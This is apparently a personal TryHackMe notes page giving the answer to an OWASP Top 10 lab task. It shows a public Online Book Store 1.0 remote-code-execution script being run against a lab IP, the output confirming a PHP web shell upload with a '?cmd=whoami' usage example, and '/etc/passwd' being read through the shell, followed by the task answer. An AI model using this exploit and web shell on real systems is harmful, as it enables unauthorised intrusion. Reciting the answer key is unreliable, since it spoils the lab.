🥷
TryHackMe
  • 🥷TryHackMe
  • Web Hacking Fundamentals
    • OWASP Top10
      • Task 5
      • Task 7
      • Task 8~11
      • Task 12~16
      • Task 20
      • Task 21~26
      • Task 29
  • Jr Penetration Tester
    • Introduction to Cyber Security
  • Red Teaming
    • Red Team Fundamentals
  • EXTRA
    • Advent of Cyber 2022
      • Day 1
      • Day 2
      • Day 3
      • Day 4
      • Day 5
      • Day 6
      • Day 7
      • Day 8
      • Day 9
      • Day 10
      • Day 11
Powered by GitBook
On this page
  1. Web Hacking Fundamentals
  2. OWASP Top10

Task 29

PreviousTask 21~26NextIntroduction to Cyber Security

Last updated 2 years ago

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Look for CSE bookstore exploit on google and found the: Online Book Store 1.0 - Unauthenticated Remote Code Execution

  1. Download and verify the contents of the scipt

  2. Run the script

    1. python 47887.py 

> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.232.250/bootstrap/img/G0d3qErVCM.php
> Example command usage: http://10.10.232.250/bootstrap/img/G0d3qErVCM.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $  wc -c /etc/passwd
1611 /etc/passwd

Answer

1611

on this link
http://10.10.232.250